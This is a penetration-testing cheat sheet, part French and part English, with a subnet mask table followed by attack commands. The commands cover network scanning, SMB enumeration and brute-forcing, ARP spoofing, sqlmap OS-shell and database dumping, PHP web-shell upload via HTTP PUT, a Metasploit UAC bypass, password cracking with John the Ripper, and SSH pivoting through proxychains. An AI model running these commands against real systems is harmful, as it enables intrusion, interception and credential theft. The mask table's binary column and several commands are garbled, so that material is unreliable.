| notation de la barre oblique | masque net | hexagonal | représentation binaire | Nombre d'hôtes |
|---|---|---|---|---|
| / 0 | 0.0.0.0 | 0x00000000 | 00000000 00000000 00000000 00000000 | 4294967296 |
| / 1 | 128.0.0.0 | 0x80000000 | 10000000 00000000 00000000 00000000 | 2147483648 |
| / 2 | 192.0.0.0 | 0xc0000000 | 11000000 00000000 00000000 00000000 | 1073741824 |
| / 3 | 224.0.0.0 | 0xe0000000 | 11100000 00000000 00000000 00000000 | 536870912 |
| / 4 | 240.0.0.0 | 0xf0000000 | 11110000 00000000 00000000 00000000 | 268435456 |
| / 5 | 248.0.0.0 | 0xf8000000 | 11111000 00000000 00000000 00000000 | 134217728 |
| / 6 | 252.0.0.0 | 0xfc000000 | 11111100 00000000 00000000 00000000 | 67108864 |
| / 7 | 254.0.0.0 | 0xfe000000 | 11111110 00000000 00000000 00000000 | 33554432 |
| / 8 | 255.0.0.0 | 0xff000000 | 1111111 00000000 00000000 00000000 | 16777216 |
| / 9 | 255.128.0.0 | 0xff800000 | 1111111110000000 00000000 00000000 | 8388608 |
| / 10 | 255.192.0.0 | 0xffc00000 | 111111111000000 00000000 00000000 | 4194304 |
| / 11 | 255.224.0.0 | 0xffe00000 | 11111111100000 00000000 00000000 | 2097152 |
| / 12 | 255.240.0.0 | 0xfff00000 | 111111111110000 00000000 00000000 | 1048576 |
| / 13 | 255.248.0.0 | 0xfff80000 | 11111111111000 00000000 00000000 | 524288 |
| / 14 | 255.252.0.0 | 0xfffc0000 | 11111111111100 00000000 00000000 | 262144 |
| / 15 | 255.254.0.0 | 0xfffe0000 | 11111111111110 00000000 00000000 | 131072 |
| / 16 | 255.255.0.0 | 0xffff0000 | 1111111111111 00000000 00000000 | 65536 |
| / 17 | 255.255.128.0 | 0xffff8000 | 1111111111111110000000 00000000 | 32768 |
| / 18 | 255.255.192.0 | 0xffffc000 | 111111111111111000000 00000000 | 16384 |
| / 19 | 255.255.224.0 | 0xffffe000 | 11111111111111100000 00000000 | 8192 |
| / 20 | 255.255.240.0 | 0xfffff000 | 111111111111111110000 00000000 | 4096 |
| / 21 | 255.255.248.0 | 0xfffff800 | 111111111111111111000 00000000 | 2048 |
| / 22 | 255.255.252.0 | 0xfffffc00 | 11111111111111111100 00000000 | 1024 |
| / 23 | 255.255.254.0 | 0xfffffe00 | 111111111111111111110 00000000 | 512 |
| / 24 | 255.255.255.0 | 0xffffff00 | 11111111111111111111 00000000 | 256 |
| / 25 | 255.255.255.128 | 0xffffff80 | 11111111111111111111110000000 | 128 |
| / 26 | 255.255.255.192 | 0xffffffc0 | 1111111111111111111111000000 | 64 |
| / 27 | 255.255.255.224 | 0xffffffe0 | 11111111111111111111100000 | 32 |
| / 28 | 255.255.255.240 | 0xfffffff0 | 111111111111111111111110000 | 16 |
| / 29 | 255.255.255.248 | 0xfffffff8 | 111111111111111111111111000 | 8 |
| / 30 | 255.255.255.252 | 0xfffffffc | 111111111111111111111111100 | 4 |
| / 31 | 255.255.255.254 | 0xfffffffe | 111111111111111111111111110 | 2 |
| / 32 | 255.255.255.255 | 0xffffffff | 111111111111111111111111111 | 1 |
Identifier le serveur Web et les technologies
Sous-domaines de Bruteforce
Énumération du répertoire
Trouver des utilisateurs, des e-mails divulgués, des identifiants, etc.
Essayez toujours /Robots..txt ,/sitemap.xml ,/crossdomain.xml
Google Dorking
site: vous pouvez utiliser cette commande pour inclure uniquement les résultats sur un nom d'hôte donné.
intitle: Cette commande filtre la page de titre.
inurl: similaire à INTITLE mais fonctionne sur l'URL d'une ressource.
filetype: ceci filtre en utilisant l'extension de fichier d'une ressource.
AND, OR, &, | Utilisation d'opérateurs logiques pour combiner les expressions.
URL de Wayback
ip route - prints the routing table for the host you are on
ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot
Utilisation du matériau trouvé sur la machine. Le fichier hosts ou le cache ARP, par exemple
Utilisation d'outils préinstallés
Utilisation d'outils compilés statiquement
Utilisation de techniques de script
Utilisation d'outils locaux via un proxy
arp -a (can be used to check the arp cache of the machine)
nano /etc/hosts (on linux, static mappings may be found)
/etc/resolv.conf (on Linux, may identify any local DNS servers, which may be misconfigured to allow a DNS zone transfer attack)
nmcli dev show (reading resolve.conf)
C:WindowsSystem32driversetchosts (On windows)
ipconfig /all (Check the DNS servers for an interface)
- /etc/proxychains.conf
[proxylist] & [proxy_dns]
sock4[5] 127.0.0.1 <port>
proxychains telnet 172.16.0.100 23
ip route add 192.168.72.23 via 10.10.10.10(VPN Gateway)ip route add 192.168.72.0/24 via 10.10.10.10(VPN Gateway) fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24
nmap -sC -sV -p- <IP>
nmap -sU -sV <IP>
nc -v 10.10.10.10 port
HEAD / HTTP/1.0
openssl s_client -connect 10.10.10.10:443
HEAD / HTTP/1.0
httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt
GET, POST, HEAD, PUT, DELETE, OPTIONS
nc 10.10.10.10 80
OPTIONS / HTPP/1.0
wc -m shell.php
x shell.php
PUT /shell.php
Content-type: text/html
Content-length: x
Directory and File Scanning
nmblookup -A <target IP> - NetBiOS sur le client TCP / IP utilisé pour rechercher des noms NetBiO
nbtstat -A <IP> - (Windows) Affiche les protocoles et les connexions TCP / IP actuelles à l'aide de NBT
net view <target ip> - outil d'administration de serveurs Samba et Remote CIFS
exlpoit/windows/localbypassuac - (module Metasploit) Windows UAC Protection Bypass
<20> record tells us that the file sharing service is up and running
enum4linux -a 10.10.10.10
enum4linux -S(enumerate shares) X.X.X.X
enum4linux -U(enumerate users) X.X.X.X
enum4linux -P(check password policy) X.X.X.X
nmap -script=smb-enum-shares
nmap -script=smb-enum-users
nmap -script=smb-brute
nmap --script smb-check-vulns.nse --script-args=unsafe-1
exlpoit/windows/localbypassuac
-L - allows you to look at what services are avaliable on a target. prepend //<IP ADDRESS>
-N - forces the tool to not ask for a password
smbclient [-U username] [-P password or -N for no password] -L \\X.X.X.X
smbclient [-U username] [-P password or -N for no password] \\X.X.X.X\share
smbclient -L //10.10.10.10 -N (list shares)
smbclient //10.10.10.10/share -N (mount share)
smbclient //X.X.X.X/IPC$ -N
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i <interface> -t <target> -r <host>
sqlmap -u <URL> -p <injection parameter> [options]
sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
--cookie (specifiying cookie)
update <table> set <parameter>="yes" where <Parameter>="<data";
Cela prépare un fichier à utiliser avec John the Ripper
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
scp <user>@<ip>/etc/passwd .
user() renvoie le nom de l'utilisateur actuellement à l'aide de la base de données
substring() renvoie une sous-chaîne d'un argument donné. Il prend trois paramètres: la chaîne d'entrée, la position de la sous-chaîne et sa longueur
Use of Metasploit - (portfwd) -h
Port forwarding is accomplished with the -L switch, which creates a link to a Local port.
ssh -L 8000:172.16.0.10:80 [email protected] -fN
-f arrive du shell, -N, dit à SSH qu'il n'a pas besoin d'exécuter des commandes - configurer uniquement la connexion
Proxies are made using the -D switch, for example: -D 1337
ssh -D 1337 [email protected] -fN
Ceci utilise à nouveau les commutateurs -FN en arrière-plan le shell. Le choix du port 1337 est complètement arbitraire - tout ce qui compte, c'est que le port est disponible et correctement configuré dans votre fichier de configuration proxychains (ou équivalent). La configuration de cette proxy nous permettrait d'acheminer tout notre trafic dans le réseau cible.